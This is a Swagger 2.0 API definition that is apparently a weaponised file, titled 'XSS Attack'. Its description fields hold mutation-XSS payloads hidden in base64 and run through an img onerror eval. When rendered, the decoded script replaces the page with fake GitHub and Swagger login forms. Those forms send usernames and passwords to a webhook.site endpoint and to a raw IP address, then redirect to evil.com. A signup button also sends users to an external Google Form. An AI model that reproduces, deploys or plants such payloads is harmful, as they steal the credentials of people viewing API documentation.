swagger: '2.0'
info:
  title: XSS Attack BY olive_cipher
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>
    <img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJzsKYWxlcnQoJ1lvdSBuZWVkIHRvIGxvZ2luIGZpcnN0IScpOwp2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2Zvcm0nKTsKYS5hY3Rpb24gPSAiaHR0cHM6Ly93ZWJob29rLnNpdGUvN2Y4MTAzMjUtZDRkYi00OGViLThiMjctNzQzMjViNDQ2ZTliIjsKYS5tZXRob2QgPSAnUE9TVCc7CmEub25zdWJtaXQgPSBmdW5jdGlvbigpIHsgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAnaHR0cDovL2V2aWwuY29tJzsgfTsKYS5pbm5lckhUTUwgPSAnPGNlbnRlcj48Yj5Ta2FmZm9sZCBHaXRodWIgQWNjb3VudDwvYj48YnI+VXNlcm5hbWU6IDxpbnB1dCBuYW1lPSJ1c2VyTmFtZSI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InB3ZCI+PGJyPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiI+PGlucHV0IHR5cGU9ImJ1dHRvbiIgdmFsdWU9IlNpZ251cCIgb25jbGljaz0id2luZG93LmxvY2F0aW9uLmhyZWYgPSBcJ2h0dHBzOi8vZm9ybXMuZ2xlL3I3MUpWM0JENzdkb3BDd2M2XCc7Ij48L2NlbnRlcj4nOwpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOwo=' onerror='eval(atob(this.id))'>
    ">
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /olive_cipher:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - olive_cipher_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  /signup:
    get:
      summary: Sign up via external form
      description: |
        <center><b>Sign up Page</b></center><br>
        <button onclick="window.open('https://docs.google.com/forms/d/e/1FAIpQLSdzDc7JiL6HgPduxy5RisPhy1iaAAsI6D5HoZs1EjsQKu1iDQ/viewform?usp=dialog')">Sign up</button>
      responses:
        '200':
          description: Opens sign up form in a new tab
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>
            <img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9Jyc7IHZhciBhPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2Zvcm0nKTthLmFjdGlvbj0iaHR0cDovLzE1Mi41OC45Ni41NDoxMzM3IjthLm1ldGhvZD0nUE9TVCc7YS5vbnN1Ym1pdD1mdW5jdGlvbigpe3dpbmRvdy5sb2NhdGlvbi5ocmVmPSdodHRwOi8vZXZpbC5jb20nfTthLmlubmVySFRNTD0nPGNlbnRlcj48Yj5GQUtFIFN3YWdnZXIgTG9naW48L2I+PGJyPlVzZXJuYW1lOiA8aW5wdXQgbmFtZT0idXNlck5hbWUiPjxicj5QYXNzd29yZDogPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwd2QiPjxicj48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iTG9naW4iPjwvY2VudGVyPic7IGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7' onerror='eval(atob(this.id))'>
            ">
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
